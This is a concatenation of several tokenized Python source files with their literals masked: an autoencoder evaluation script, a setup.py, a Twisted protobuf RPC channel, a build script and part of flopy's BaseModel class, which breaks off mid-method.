<NUM_LIT:1> ] = ae_2 . biases [ <NUM_LIT:0> ] <EOL> net_baseline . weights [ <NUM_LIT:1> ] = ae_2 . weights [ <NUM_LIT:0> ] <EOL> error_baseline = sum ( np . linalg . norm ( net_baseline . feedforward ( x ) - y , <NUM_LIT:1> ) <EOL> for ( x , y ) in test_data ) <EOL> print "<STR_LIT>" % ( error_baseline / SIZE , ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" % ( <EOL> sum ( y . mean ( ) for _ , y in test_data ) / SIZE , ) <EOL> error = sum ( np . linalg . norm ( net . feedforward ( x ) - y , <NUM_LIT:1> ) for ( x , y ) in test_data ) <EOL> print "<STR_LIT>" % ( error / SIZE , ) <EOL> print "<STR_LIT>" <EOL> fiducial_images_1 = [ <EOL> ae_1 . weights [ <NUM_LIT:0> ] [ j , : ] . reshape ( <NUM_LIT> , <NUM_LIT> ) / np . linalg . norm ( net . weights [ <NUM_LIT:0> ] [ j , : ] ) <EOL> for j in range ( HIDDEN ) ] <EOL> fiducial_images_2 = [ <EOL> ae_2 . weights [ <NUM_LIT:0> ] [ j , : ] . reshape ( <NUM_LIT> , <NUM_LIT> ) / np . linalg . norm ( net . weights [ <NUM_LIT:0> ] [ j , : ] ) <EOL> for j in range ( HIDDEN ) ] <EOL> image = np . concatenate ( [ np . concatenate ( fiducial_images_1 , axis = <NUM_LIT:1> ) , <EOL> np . concatenate ( fiducial_images_2 , axis = <NUM_LIT:1> ) ] ) <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT> ) <EOL> ax . matshow ( image , cmap = matplotlib . cm . binary ) <EOL> plt . xticks ( np . array ( [ ] ) ) <EOL> plt . yticks ( np . array ( [ ] ) ) <EOL> plt . show ( ) </s>
<s> class DownloaderError ( Exception ) : <EOL> def __init__ ( self , value ) : <EOL> self . value = value <EOL> def __str__ ( self ) : <EOL> return repr ( self . value ) </s>
<s> import os <EOL> from setuptools import setup <EOL> EXTRAS = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> } <EOL> EXTRAS [ '<STR_LIT:all>' ] = ( <EOL> EXTRAS [ '<STR_LIT>' ] + <EOL> EXTRAS [ '<STR_LIT>' ] + <EOL> EXTRAS [ '<STR_LIT>' ] + <EOL> EXTRAS [ '<STR_LIT>' ] <EOL> ) <EOL> try : <EOL> from setuptools . command import egg_info <EOL> egg_info . write_toplevel_names <EOL> except ( ImportError , AttributeError ) : <EOL> pass <EOL> else : <EOL> def _top_level_package ( name ) : <EOL> return name . split ( '<STR_LIT:.>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> def _hacked_write_toplevel_names ( cmd , basename , filename ) : <EOL> pkgs = dict . fromkeys ( <EOL> [ _top_level_package ( k ) <EOL> for k in cmd . distribution . iter_distribution_names ( ) <EOL> if _top_level_package ( k ) != "<STR_LIT>" <EOL> ] <EOL> ) <EOL> cmd . write_file ( "<STR_LIT>" , filename , '<STR_LIT:\n>' . join ( pkgs ) + '<STR_LIT:\n>' ) <EOL> egg_info . write_toplevel_names = _hacked_write_toplevel_names <EOL> def read ( fname ) : <EOL> return open ( os . path . join ( os . path . dirname ( __file__ ) , fname ) ) . read ( ) <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = "<STR_LIT>" , <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT>" , <EOL> maintainer = "<STR_LIT>" , <EOL> maintainer_email = "<STR_LIT>" , <EOL> description = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> license = "<STR_LIT>" , <EOL> keywords = "<STR_LIT>" , <EOL> url = "<STR_LIT>" , <EOL> packages = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> package_data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> } , <EOL> zip_safe = False , <EOL> long_description = read ( '<STR_LIT>' ) , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> extras_require = EXTRAS , <EOL> ) </s>
<s> import sys <EOL> import shlex <EOL> import six <EOL> PY2 = sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> <EOL> if PY2 : <EOL> from BaseHTTPServer import BaseHTTPRequestHandler <EOL> from urlparse import urlsplit , parse_qs <EOL> else : <EOL> from http . server import BaseHTTPRequestHandler <EOL> from urllib . parse import urlsplit , parse_qs <EOL> text_type = six . text_type <EOL> byte_type = six . binary_type <EOL> basestring = six . string_types <EOL> def encode_utf8 ( s ) : <EOL> if isinstance ( s , text_type ) : <EOL> s = s . encode ( '<STR_LIT:utf-8>' ) <EOL> return byte_type ( s ) <EOL> def decode_utf8 ( s ) : <EOL> if isinstance ( s , byte_type ) : <EOL> s = s . decode ( "<STR_LIT:utf-8>" ) <EOL> return text_type ( s ) <EOL> def shsplit ( s ) : <EOL> if PY2 : <EOL> s = encode_utf8 ( s ) <EOL> else : <EOL> s = decode_utf8 ( s ) <EOL> return shlex . split ( s ) </s>
<s> import twisted . internet . protocol <EOL> from twisted . internet import reactor <EOL> from twisted . internet . defer import Deferred <EOL> from twisted . protocols . basic import Int32StringReceiver <EOL> from twisted . internet . protocol import DatagramProtocol <EOL> import google . protobuf . service <EOL> from protobufrpc_pb2 import Rpc , Request , Response , Error <EOL> from common import Controller <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> class BaseChannel ( google . protobuf . service . RpcChannel ) : <EOL> id = <NUM_LIT:0> <EOL> def __init__ ( self ) : <EOL> google . protobuf . service . RpcChannel . __init__ ( self ) <EOL> self . _pending = { } <EOL> self . _services = { } <EOL> def add_service ( self , service ) : <EOL> self . _services [ service . GetDescriptor ( ) . name ] = service <EOL> def unserialize_response ( self , serializedResponse , responseClass , rpcController ) : <EOL> response = responseClass ( ) <EOL> if serializedResponse . error : <EOL> rpcController . setFailed ( serializedResponse . error . text ) <EOL> else : <EOL> response . ParseFromString ( serializedResponse . serialized_response ) <EOL> return response , rpcController <EOL> def serialize_response ( self , response , serializedRequest , controller ) : <EOL> serializedResponse = Response ( ) <EOL> serializedResponse . id = serializedRequest . id <EOL> if controller . Failed ( ) : <EOL> serializedResponse . error . code = <NUM_LIT:1> <EOL> serializedResponse . error . text = controller . ErrorText ( ) <EOL> else : <EOL> serializedResponse . serialized_response = response . SerializeToString ( ) <EOL> return serializedResponse <EOL> def serialize_rpc ( self , serializedResponse ) : <EOL> rpc = Rpc ( ) <EOL> rpcResponse = rpc . response . add ( ) <EOL> rpcResponse . serialized_response = serializedResponse . serialized_response <EOL> rpcResponse . id = serializedResponse . id <EOL> if serializedResponse . error . code != <NUM_LIT:0> : <EOL> rpcResponse . error . code = serializedResponse . error . code <EOL> rpcResponse . error . text = serializedResponse . error . text <EOL> return rpc <EOL> def _call_method ( self , methodDescriptor , rpcController , request , responseClass , done ) : <EOL> self . id += <NUM_LIT:1> <EOL> d = Deferred ( ) <EOL> d . addCallback ( self . unserialize_response , responseClass , rpcController ) <EOL> d . addCallback ( done ) <EOL> self . _pending [ self . id ] = d <EOL> rpc = Rpc ( ) <EOL> rpcRequest = rpc . request . add ( ) <EOL> rpcRequest . method = methodDescriptor . containing_service . name + '<STR_LIT:.>' + methodDescriptor . name <EOL> rpcRequest . serialized_request = request . SerializeToString ( ) <EOL> rpcRequest . id = self . id <EOL> return rpc <EOL> def CallMethod ( self , methodDescriptor , rpcController , request , responseClass , done ) : <EOL> pass <EOL> class RpcErrors : <EOL> SUCCESS = <NUM_LIT:0> <EOL> UNSERIALIZE_RPC = <NUM_LIT:1> <EOL> SERVICE_NOT_FOUND = <NUM_LIT:2> <EOL> METHOD_NOT_FOUND = <NUM_LIT:3> <EOL> CANNOT_DESERIALIZE_REQUEST = <NUM_LIT:4> <EOL> msgs = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> class TcpChannel ( BaseChannel , Int32StringReceiver ) : <EOL> def CallMethod ( self , methodDescriptor , rpcController , request , responseClass , done ) : <EOL> rpc = self . _call_method ( methodDescriptor , rpcController , request , responseClass , done ) <EOL> self . sendString ( rpc . SerializeToString ( ) ) <EOL> def stringReceived ( self , data ) : <EOL> rpc = Rpc ( ) <EOL> rpc . ParseFromString ( data ) <EOL> for serializedRequest in rpc . request : <EOL> service = self . _services [ serializedRequest . method . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] ] <EOL> if not service : <EOL> self . sendError ( serializedRequest . id , RpcErrors . SERVICE_NOT_FOUND ) <EOL> return <EOL> method = service . GetDescriptor ( ) . FindMethodByName ( serializedRequest . method . split ( '<STR_LIT:.>' ) [ <NUM_LIT:1> ] ) <EOL> if not method : <EOL> self . sendError ( serializedRequest . id , RpcErrors . METHOD_NOT_FOUND ) <EOL> return <EOL> request = service . GetRequestClass ( method ) ( ) <EOL> request . ParseFromString ( serializedRequest . serialized_request ) <EOL> controller = Controller ( ) <EOL> d = Deferred ( ) <EOL> d . addCallback ( self . serialize_response , serializedRequest , controller ) <EOL> d . addCallback ( self . serialize_rpc ) <EOL> d . addCallback ( lambda rpc : self . sendString ( rpc . SerializeToString ( ) ) ) <EOL> service . CallMethod ( method , controller , request , d . callback ) <EOL> for serializedResponse in rpc . response : <EOL> id = serializedResponse . id <EOL> if self . _pending . has_key ( id ) : <EOL> self . _pending [ id ] . callback ( serializedResponse ) <EOL> def sendError ( self , id , code ) : <EOL> rpc = Rpc ( ) <EOL> rpcResponse = rpc . response . add ( ) <EOL> rpcResponse . id = id <EOL> rpcResponse . error . code = code <EOL> rpcResponse . error . text = RpcErrors . msgs [ code ] <EOL> self . sendString ( rpc . SerializeToString ( ) ) <EOL> class UdpChannel ( BaseChannel , DatagramProtocol ) : <EOL> def __init__ ( self , host = None , port = None ) : <EOL> self . _host = host <EOL> self . _port = port <EOL> self . connected = False <EOL> BaseChannel . __init__ ( self ) <EOL> def startProtocol ( self ) : <EOL> if self . _host and self . _port : <EOL> self . transport . connect ( self . _host , self . _port ) <EOL> self . connected = True <EOL> def datagramReceived ( self , data , ( host , port ) ) : <EOL> rpc = Rpc ( ) <EOL> rpc . ParseFromString ( data ) <EOL> for serializedRequest in rpc . request : <EOL> service = self . _services [ serializedRequest . method . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] ] <EOL> if not service : <EOL> self . sendError ( serializedRequest . id , RpcErrors . SERVICE_NOT_FOUND , host , port ) <EOL> return <EOL> method = service . GetDescriptor ( ) . FindMethodByName ( serializedRequest . method . split ( '<STR_LIT:.>' ) [ <NUM_LIT:1> ] ) <EOL> if not method : <EOL> self . sendError ( serializedRequest . id , RpcErrors . METHOD_NOT_FOUND , host , port ) <EOL> return <EOL> request = service . GetRequestClass ( method ) ( ) <EOL> request . ParseFromString ( serializedRequest . serialized_request ) <EOL> controller = Controller ( ) <EOL> d = Deferred ( ) <EOL> d . addCallback ( self . serialize_response , serializedRequest ) <EOL> d . addCallback ( self . serialize_rpc ) <EOL> d . addCallback ( lambda rpc : self . send_string ( rpc . SerializeToString ( ) , host , port ) ) <EOL> service . CallMethod ( method , controller , request , d . callback ) <EOL> for serializedResponse in rpc . response : <EOL> id = serializedResponse . id <EOL> if self . _pending . has_key ( id ) : <EOL> self . _pending [ id ] . callback ( serializedResponse ) <EOL> def send_string ( self , data , host = None , port = None ) : <EOL> if host and port : <EOL> self . transport . write ( data , ( host , port ) ) <EOL> else : <EOL> self . transport . write ( data ) <EOL> def CallMethod ( self , methodDescriptor , rpcController , request , responseClass , done ) : <EOL> rpc = self . _call_method ( methodDescriptor , request , responseClass , done ) <EOL> self . send_string ( rpc . SerializeToString ( ) ) <EOL> def sendError ( self , id , code , host , port ) : <EOL> rpc = Rpc ( ) <EOL> rpcResponse = rpc . response . add ( ) <EOL> rpcResponse . id = id <EOL> rpcResponse . error . code = code <EOL> rpcResponse . error . text = RpcErrors . msgs [ code ] <EOL> self . sendString ( rpc . SerializeToString ( ) , host , port ) <EOL> class Factory ( twisted . internet . protocol . Factory ) : <EOL> protocol = TcpChannel <EOL> def __init__ ( self , * services ) : <EOL> self . _protocols = [ ] <EOL> self . _services = { } <EOL> for s in services : <EOL> self . _services [ s . GetDescriptor ( ) . name ] = s <EOL> def buildProtocol ( self , addr ) : <EOL> p = self . protocol ( ) <EOL> p . factory = self <EOL> p . _services = self . _services <EOL> self . _protocols . append ( p ) <EOL> return p <EOL> class Proxy ( object ) : <EOL> class _Proxy ( object ) : <EOL> def __init__ ( self , stub ) : <EOL> self . _stub = stub <EOL> def __getattr__ ( self , key ) : <EOL> def call ( method , request ) : <EOL> d = Deferred ( ) <EOL> controller = Controller ( ) <EOL> method ( controller , request , d . callback ) <EOL> return d <EOL> return lambda request : call ( getattr ( self . _stub , key ) , request ) <EOL> def __init__ ( self , * stubs ) : <EOL> self . _stubs = { } <EOL> for s in stubs : <EOL> self . _stubs [ s . GetDescriptor ( ) . name ] = self . _Proxy ( s ) <EOL> def __getattr__ ( self , key ) : <EOL> return self . _stubs [ key ] </s>
<s> import os <EOL> import sys <EOL> import platform <EOL> import subprocess <EOL> from updateversion import update_version <EOL> def build_distribution ( upd = False , utag = False , install = False , <EOL> reg = False , winbuild = False , <EOL> major = False , minor = False ) : <EOL> if upd : <EOL> update_version ( utag , major , minor ) <EOL> if install : <EOL> subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if winbuild : <EOL> if '<STR_LIT>' in platform . system ( ) . lower ( ) : <EOL> subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if reg : <EOL> subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> uver = False <EOL> install = False <EOL> utag = False <EOL> register = False <EOL> winbuild = False <EOL> major = False <EOL> minor = False <EOL> for arg in sys . argv : <EOL> if arg . lower ( ) == '<STR_LIT>' or arg . lower ( ) == '<STR_LIT>' : <EOL> uver = True <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> elif arg . lower ( ) == '<STR_LIT>' or arg . lower ( ) == '<STR_LIT>' : <EOL> install = True <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> elif arg . lower ( ) == '<STR_LIT>' or arg . lower ( ) == '<STR_LIT>' : <EOL> register = True <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> elif arg . lower ( ) == '<STR_LIT>' or arg . lower ( ) == '<STR_LIT>' : <EOL> utag = True <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> elif arg . lower ( ) == '<STR_LIT>' or arg . lower ( ) == '<STR_LIT>' : <EOL> winbuild = True <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> elif arg . lower ( ) == '<STR_LIT>' or arg . lower ( ) == '<STR_LIT>' : <EOL> major = True <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> elif arg . lower ( ) == '<STR_LIT>' or arg . lower ( ) == '<STR_LIT>' : <EOL> minor = True <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> build_distribution ( uver , utag , install , <EOL> register , winbuild , major , minor ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import sys <EOL> import os <EOL> import subprocess as sp <EOL> import copy <EOL> import numpy as np <EOL> from flopy import utils <EOL> iconst = <NUM_LIT:1> <EOL> iprn = - <NUM_LIT:1> <EOL> def is_exe ( fpath ) : <EOL> return os . path . isfile ( fpath ) and os . access ( fpath , os . X_OK ) <EOL> def which ( program ) : <EOL> fpath , fname = os . path . split ( program ) <EOL> if fpath : <EOL> if is_exe ( program ) : <EOL> return program <EOL> else : <EOL> if is_exe ( program ) : <EOL> return program <EOL> for path in os . environ [ "<STR_LIT>" ] . split ( os . pathsep ) : <EOL> path = path . strip ( '<STR_LIT:">' ) <EOL> exe_file = os . path . join ( path , program ) <EOL> if is_exe ( exe_file ) : <EOL> return exe_file <EOL> return None <EOL> class BaseModel ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , modelname = '<STR_LIT>' , namefile_ext = '<STR_LIT>' , <EOL> exe_name = '<STR_LIT>' , model_ws = None , <EOL> structured = True , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . __name = modelname <EOL> self . namefile_ext = namefile_ext <EOL> self . namefile = self . __name + '<STR_LIT:.>' + self . namefile_ext <EOL> self . packagelist = [ ] <EOL> self . heading = '<STR_LIT>' <EOL> self . exe_name = exe_name <EOL> self . external_extension = '<STR_LIT>' <EOL> if model_ws is None : model_ws = os . getcwd ( ) <EOL> if not os . path . exists ( model_ws ) : <EOL> try : <EOL> os . makedirs ( model_ws ) <EOL> except : <EOL> print ( <EOL> '<STR_LIT>' . format ( <EOL> model_ws , os . getcwd ( ) ) ) <EOL> model_ws = os . getcwd ( ) <EOL> self . _model_ws = model_ws <EOL> self . structured = structured <EOL> self . pop_key_list = [ ] <EOL> self . cl_params = '<STR_LIT>' <EOL> xul = kwargs . pop ( "<STR_LIT>" , None ) <EOL> yul = kwargs . pop ( "<STR_LIT>" , None ) <EOL> rotation = kwargs . pop ( "<STR_LIT>" , <NUM_LIT:0.0> ) <EOL> proj4_str = kwargs . pop ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . start_datetime = kwargs . pop ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . _sr = utils . SpatialReference ( xul = xul , yul = yul , rotation = rotation , <EOL> proj4_str = proj4_str ) <EOL> self . array_free_format = True <EOL> self . array_format = None <EOL> self . external_fnames = [ ] <EOL> self . external_units = [ ] <EOL> self . external_binflag = [ ] <EOL> self . package_units = [ ] <EOL> return <EOL> def set_free_format ( self , value = True ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( value , bool ) : <EOL> print ( '<STR_LIT>' ) <EOL> return False <EOL> self . array_free_format = value <EOL> def get_free_format ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . array_free_format <EOL> def next_ext_unit ( self ) : <EOL> """<STR_LIT>""" <EOL> next_unit = self . _next_ext_unit + <NUM_LIT:1> <EOL> self . _next_ext_unit += <NUM_LIT:1> <EOL> return next_unit <EOL> def export ( self , f , ** kwargs ) : <EOL> from . export import utils <EOL> return utils . model_helper ( f , self , ** kwargs ) <EOL> def add_package ( self , p ) : <EOL> """<STR_LIT>""" <EOL> for u in p . unit_number : <EOL> if u in self . package_units or u in self . external_units : <EOL> print ( "<STR_LIT>" . format ( <EOL> u , p . name ) ) <EOL> self . package_units . append ( u ) <EOL> for i , pp in enumerate ( self . packagelist ) : <EOL> if pp . allowDuplicates : <EOL> continue <EOL> elif isinstance ( p , type ( pp ) ) : <EOL> print ( '<STR_LIT>' , <EOL> type ( p ) , type ( pp ) ) <EOL> print ( '<STR_LIT>' ) <EOL> self . packagelist [ i ] = p <EOL> return <EOL> if self . verbose : <EOL> print ( '<STR_LIT>' , p . name [ <NUM_LIT:0> ] ) <EOL> self . packagelist . append ( p ) <EOL> def remove_package ( self , pname ) : <EOL> """<STR_LIT>""" <EOL> for i , pp in enumerate ( self . packagelist ) : <EOL> if pname in pp . name : <EOL> if self . verbose : <EOL> print ( '<STR_LIT>' , pp . name ) <EOL> self . packagelist . pop ( i ) <EOL> return <EOL> raise StopIteration ( <EOL> '<STR_LIT>' + pname + '<STR_LIT>' ) <EOL> def __getattr__ ( self , item ) : <EOL> """<STR_LIT>""" <EOL> if item == '<STR_LIT>' : <EOL> if self . dis is not None : <EOL> self . _sr . reset ( delr = self . dis . delr . array , <EOL> delc = self . dis . delc . array , <EOL> lenuni = self . dis . lenuni ) <EOL> return self . _sr <EOL> return self . get_package ( item ) <EOL> def add_external ( self , fname , unit , binflag = False ) : <EOL> """<STR_LIT>""" <EOL> if fname in self . external_fnames : <EOL> print ( "<STR_LIT>" + <EOL> "<STR_LIT>" . format ( fname ) ) <EOL> idx = self . external_fnames . index ( fname ) <EOL> self . external_fnames . pop ( idx ) <EOL> self . external_units . pop ( idx ) <EOL> self . external_binflag . pop ( idx ) <EOL> self . external_fnames . append ( fname ) <EOL> self . external_units . append ( unit ) <EOL> self . external_binflag . append ( binflag ) <EOL> return <EOL> def remove_external ( self , fname = None , unit = None ) : <EOL> """<STR_LIT>""" <EOL> if fname is not None : <EOL> for i , e in enumerate ( self . external_fnames ) : <EOL> if fname in e : <EOL> self . external_fnames . pop ( i ) <EOL> self . external_units . pop ( i ) <EOL> self . external_binflag . pop ( i ) <EOL> elif unit is not None : <EOL> for i , u in enumerate ( self . external_units ) : <EOL> if u == unit : <EOL> self . external_fnames . pop ( i ) <EOL> self . external_units . pop ( i ) <EOL> self . external_binflag . pop ( i ) <EOL> else : <EOL> raise Exception ( <EOL> '<STR_LIT>' ) <EOL> return <EOL> def get_name_file_entries ( self ) : <EOL> """<STR_LIT>""" <EOL> s = '<STR_LIT>' <EOL> for p in self . packagelist : <EOL> for i in range ( len ( p . name ) ) : <EOL> if p . unit_number [ i ] == <NUM_LIT:0> : <EOL> continue <EOL> s = s + ( '<STR_LIT>' . format ( p . name [ i ] , <EOL> p . unit_number [ <EOL> i ] , <EOL> p . file_name [ i ] , <EOL> p . extra [ i ] ) ) <EOL> return s <EOL> def get_package ( self , name ) : <EOL> """<STR_LIT>""" <EOL> for pp in ( self . packagelist ) : <EOL> if ( pp . name [ <NUM_LIT:0> ] . upper ( ) == name . upper ( ) ) : <EOL> return pp <EOL> return None <EOL> def get_package_list ( self ) : <EOL> """<STR_LIT>""" <EOL> val = [ ] <EOL> for pp in ( self . packagelist ) : <EOL> val . append ( pp . name [ <NUM_LIT:0> ] . upper ( ) ) <EOL> return val <EOL> def set_version ( self , version ) : <EOL> self . version = version . lower ( ) <EOL> if self . version not in list ( self . version_types . keys ( ) ) : <EOL> err = '<STR_LIT>' . format ( <EOL> self . version ) + '<STR_LIT>' <EOL> for v in list ( self . version_types . keys ( ) ) : <EOL> err += '<STR_LIT>' . format ( v ) <EOL> raise Exception ( err ) <EOL> self . heading = '<STR_LIT>' . format ( <EOL> self . version_types [ self . version ] ) <EOL> return None <EOL> def change_model_ws ( self , new_pth = None , reset_external = False ) : <EOL> """<STR_LIT>""" <EOL> if new_pth is None : <EOL> new_pth = os . getcwd ( ) <EOL> if not os . path . exists ( new_pth ) : <EOL> try : <EOL> sys . stdout . write ( <EOL> '<STR_LIT>' . format ( new_pth ) ) <EOL> os . makedirs ( new_pth ) <EOL> except : <EOL> print ( <EOL> '<STR_LIT>' . format ( <EOL> new_pth , os . getcwd ( ) ) ) <EOL> new_pth = os . getcwd ( ) <EOL> self . _model_ws = new_pth <EOL> sys . stdout . write ( <EOL> '<STR_LIT>' . format ( new_pth ) ) <EOL> for pp in ( self . packagelist ) : <EOL> pp . fn_path = os . path . join ( self . model_ws , pp . file_name [ <NUM_LIT:0> ] ) <EOL> if hasattr ( self , "<STR_LIT>" ) and self . external_path is not None and not os . path . exists ( os . path . join ( self . _model_ws , <EOL> self . external_path ) ) : <EOL> pth = os . path . join ( self . _model_ws , self . external_path ) <EOL> os . makedirs ( pth ) <EOL> if reset_external : <EOL> self . _reset_external ( pth ) <EOL> elif reset_external : <EOL> self . _reset_external ( self . _model_ws ) <EOL> return None <EOL> def _reset_external ( self , pth ) : <EOL> new_ext_fnames = [ ] <EOL> for ext_file in self . external_fnames : <EOL> new_ext_file = os . path . join ( pth , os . path . split ( ext_file ) [ - <NUM_LIT:1> ] ) <EOL> new_ext_fnames . append ( new_ext_file ) <EOL> self . external_fnames = new_ext_fnames <EOL> @ property <EOL> def model_ws ( self ) : <EOL> return copy . deepcopy ( self . _model_ws ) <EOL> def _set_name ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . __name = str ( value ) <EOL> self . namefile = self . __name + '<STR_LIT:.>' + self . namefile_ext <EOL> for p in self . packagelist : <EOL> for i in range ( len ( p . extension ) ) : <EOL> p . file_name [ i ] = self . __name + '<STR_LIT:.>' + p . extension [ i ] <EOL> p . fn_path = os . path . join ( self . model_ws , p . file_name [ <NUM_LIT:0> ] ) <EOL> def __setattr__ ( self , key , value ) : <EOL> if key == "<STR_LIT:name>" : <EOL> self . _set_name ( value ) <EOL> elif key == "<STR_LIT>" : <EOL> self . change_model_ws ( value ) <EOL> elif key == "<STR_LIT>" : <EOL> assert isinstance ( value , utils . SpatialReference ) <EOL> self . _sr = value <EOL> else : <EOL> super ( BaseModel , self ) . __setattr__ ( key , value ) <EOL> def run_model ( self , silent = False , pause = False , report = False , <EOL> normal_msg = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return run_model ( self . exe_name , self . namefile , model_ws = self . model_ws , <EOL> silent = silent , pause = pause , report = report , <EOL> normal_msg = normal_msg ) <EOL> def load_results ( self ) : <EOL> print ( '<STR_LIT>' ) <EOL> return None <EOL> def write_input ( self , SelPackList = False , check = False ) : <EOL> """<STR_LIT>""" <EOL> if check : <EOL> self . check ( f = '<STR_LIT>' . format ( self . name ) , verbose = self . verbose , <EOL> level = <NUM_LIT:1> ) <EOL> if self . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> if SelPackList == False : <EOL> for p in self . packagelist : <EOL> if self . verbose : <EOL> print ( '<STR_LIT>' , p . name [ <NUM_LIT:0> ] ) <EOL> try : <EOL> p . write_file ( check = False ) <EOL> except TypeError : <EOL> p . write_file ( ) <EOL> else : <EOL> for pon in SelPackList : <EOL> for i , p in enumerate ( self . packagelist ) : <EOL> if pon in p . name : <EOL> if self . verbose : <EOL> print ( '<STR_LIT>' , p . name [ <NUM_LIT:0> ] ) <EOL> try : <EOL> p . write_file ( check = False ) <EOL> except TypeError : <EOL> p . write_file ( ) <EOL> break <EOL> if self . verbose : <EOL> print ( '<STR_LIT:U+0020>' ) <EOL> self . write_name_file ( ) <EOL> return <EOL> def write_name_file ( self ) : <EOL> """<STR_LIT>""" <EOL> raise Exception ( <EOL> '<STR_LIT>' ) <EOL> @ property <EOL> def name ( self ) : <EOL> """<STR_LIT>""" <EOL> return copy . deepcopy ( self . __name ) <EOL> def add_pop_key_list ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if key not in self . pop_key_list : <EOL> self . pop_key_list . append ( key ) <EOL> def check ( self , f = None , verbose = True , level = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> results = { } <EOL> for p in self . packagelist : <EOL> results [ p . name [ <NUM_LIT:0> ] ] = p . check ( f = None , verbose = False , <EOL> level = level - <NUM_LIT:1> ) <EOL> chk = utils . check ( self , f = f , verbose = verbose , level = level ) <EOL> if self . version in chk . solver_packages . keys ( ) : <EOL> solvers = set ( chk . solver_packages [ self . version ] ) . intersection ( <EOL> set ( self . get_package_list ( ) ) ) <EOL> if not solvers : <EOL> chk . _add_to_summary ( '<STR_LIT>' , desc = '<STR_LIT>' , <EOL> package = '<STR_LIT>' ) <EOL> elif len ( list ( solvers ) ) > <NUM_LIT:1> : <EOL> for s in solvers : <EOL> chk . _add_to_summary ( '<STR_LIT>' , <EOL> desc = '<STR_LIT>' , <EOL> package = s ) <EOL> else : <EOL> chk . passed . append ( '<STR_LIT>' ) <EOL> package_units = { } <EOL> duplicate_units = { } <EOL> for p in self . packagelist : <EOL> for i in range ( len ( p . name ) ) : <EOL> if p . unit_number [ i ] != <NUM_LIT:0> : <EOL> if p . unit_number [ i ] in package_units . values ( ) : <EOL> duplicate_units [ p . name [ i ] ] = p . unit_number [ i ] <EOL> otherpackage = [ k for k , v in package_units . items ( ) <EOL> if v == p . unit_number [ i ] ] [ <NUM_LIT:0> ] <EOL> duplicate_units [ otherpackage ] = p . unit_number [ i ] <EOL> if len ( duplicate_units ) > <NUM_LIT:0> : <EOL> for k , v in duplicate_units . items ( ) : <EOL> chk . _add_to_summary ( '<STR_LIT>' , package = k , value = v , <EOL> desc = '<STR_LIT>' ) <EOL> else : <EOL> chk . passed . append ( '<STR_LIT>' ) <EOL> for k , r in results . items ( ) : <EOL> if r is not None and r . summary_array is not None : <EOL> chk . summary_array = np . append ( chk . summary_array , <EOL> r . summary_array ) . view ( <EOL> np . recarray ) <EOL> chk . passed += [ '<STR_LIT>' . format ( r . package . name [ <NUM_LIT:0> ] , psd ) <EOL> for psd in r . passed ] <EOL> chk . summarize ( ) <EOL> return chk <EOL> def plot ( self , SelPackList = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in kwargs : <EOL> kper = int ( kwargs . pop ( '<STR_LIT>' ) ) <EOL> else : <EOL> kper = <NUM_LIT:0> <EOL> if 